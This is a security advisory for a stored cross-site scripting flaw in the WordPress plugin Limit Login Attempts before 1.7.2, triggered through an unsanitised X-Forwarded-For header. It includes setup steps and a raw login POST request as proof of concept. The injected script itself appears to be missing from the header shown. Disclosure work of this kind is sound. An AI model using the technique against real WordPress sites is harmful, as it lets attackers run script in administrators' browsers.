Limit Login Attempts < 1.7.2 - Unauthenticated Stored XSS

The plugin does not sanitize and escape the IP address retrieved from headers such as X-Forwarded-For when the “Site Connection” settings is set to “From behind a reversy proxy”, which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks

PoC

Setup: As admin, set the “Site Connection” settings to “From behind a reversy proxy” (/wp-admin/options-general.php?page=limit-login-attempts) As unauthenticated, make multiple invalid login attempt with the following X-Forwarded-For header: 22.22.22.22 POST /wp-login.php HTTP/2 Cookie: _ga=GA1.1.1425100944.1668087471; _ga_1PQ8LT9B4M=GS1.1.1668092159.2.0.1668092159.0.0.0; _ga_NCY6KM92V3=GS1.1.1670952626.1.0.1670952626.60.0.0; wordpress_test_cookie=WP%20Cookie%20check Content-Length: 124 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 X-Forwarded-For: 22.22.22.22 log=test&pwd;=test&wp-submit;=Log+In&testcookie;=1 The XSS will be triggered when viewing the logs: https://example.com/wp-admin/options-general.php?page=limit-login-attempts